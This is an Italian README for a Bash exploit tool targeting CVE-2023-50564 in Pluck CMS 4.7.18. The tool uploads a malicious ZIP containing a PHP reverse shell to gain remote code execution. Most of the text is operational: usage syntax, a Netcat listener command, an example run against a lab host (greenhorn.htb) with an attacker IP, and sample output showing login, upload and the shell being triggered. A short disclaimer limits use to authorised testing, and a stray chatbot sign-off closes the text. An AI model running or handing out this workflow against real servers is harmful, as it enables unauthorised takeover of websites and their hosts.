
Exploit Bash che automatizza l'esecuzione remota di codice autenticata in Pluck CMS 4.7.18 tramite upload di ZIP dannoso, attivando una reverse shell PHP per CVE-2023-50564.
Questo script sfrutta una vulnerabilità di Remote Code Execution (RCE) in Pluck CMS v4.7.18. La vulnerabilità consente a un utente malintenzionato di caricare un file PHP malevolo sul server ed eseguirlo, ottenendo l'esecuzione remota di comandi sulla macchina target.
Lo script automatizza l'intero processo:
Nota: Lo script richiede un listener Netcat sulla macchina dell'attaccante per ricevere la reverse shell.
Prima di eseguire lo script, assicurati di avere:
./CVE-2023-50564 -h <host> -P <password> -i <IP> -p <porta>
-h <host>: L'host target (es. greenhorn.htb).-P <password>: La password per il pannello di amministrazione di Pluck CMS (es. abcd123).-i <IP>: L'indirizzo IP dell'attaccante per ricevere la reverse shell.-p <porta>: La porta su cui è in ascolto il listener Netcat per catturare la reverse shell../CVE-2023-50564 -h greenhorn.htb -P ********* -i 10.10.16.7 -p 9001
Imposta il listener Netcat: Sulla macchina dell'attaccante, avvia un listener Netcat sulla porta specificata:
nc -nvlp <porta>
Ad esempio:
nc -nvlp 9001
Esegui lo script: Fornisci i parametri richiesti allo script, inclusi host, password, indirizzo IP e porta.
./CVE-2023-50564 -h greenhorn.htb -P ********* -i 10.10.16.7 -p 9001
Esecuzione dello Script:
love.php)."RCE is waiting for you, please go take a look.", e lo script terminerà dopo aver tracciato il tempo impiegato.Accedi al Target: Una volta attivata la reverse shell, la connessione apparirà nel tuo listener Netcat, dandoti accesso remoto alla macchina target.
image
./CVE-2023-50564 -h greenhorn.htb -P ********* -i 10.10.16.7 -p 9001
Netcat listener detected on port 9001.
Downloading reverse shell PHP exploit...
updating: love.php (deflated 60%)
Exploit zipped as loverce.zip and original PHP file removed.
Extracted Cookie: PHPSESSID=somecookievalue
Login successful!
ZIP file uploaded successfully.
RCE is waiting for you, please go take a look.
Script terminated. Total time taken: 70 seconds.
Puoi installare curl e netcat usando i seguenti comandi se non sono già installati:
sudo apt update
sudo apt install curl netcat
sudo yum install curl nc
Questo script è destinato esclusivamente a scopi educativi e a test di penetrazione autorizzati. L'uso non autorizzato di questo script è illegale e non etico. Ottieni sempre l'autorizzazione appropriata prima di sfruttare qualsiasi vulnerabilità su un sistema.
504 Gateway Time-out: Lo script potrebbe incorrere in questo errore durante il tentativo di eseguire la reverse shell, ma ciò non influisce sul successo dell'esecuzione della shell. L'errore è solitamente dovuto al fatto che il server target impiega troppo tempo per rispondere alla richiesta HTTP, ma la shell dovrebbe comunque funzionare.
Problemi con il Listener Netcat: Se non ricevi la reverse shell, assicurati che l'indirizzo IP e la porta siano impostati correttamente e che non ci siano restrizioni firewall che impediscono al target di connettersi alla tua macchina.
Lo Script non Riusce ad Accedere: Se l'accesso al pannello di amministrazione del CMS fallisce, verifica la password fornita e assicurati che il CMS sia accessibile sulla macchina target.
Fammi sapere se desideri ulteriori personalizzazioni o chiarimenti nel README!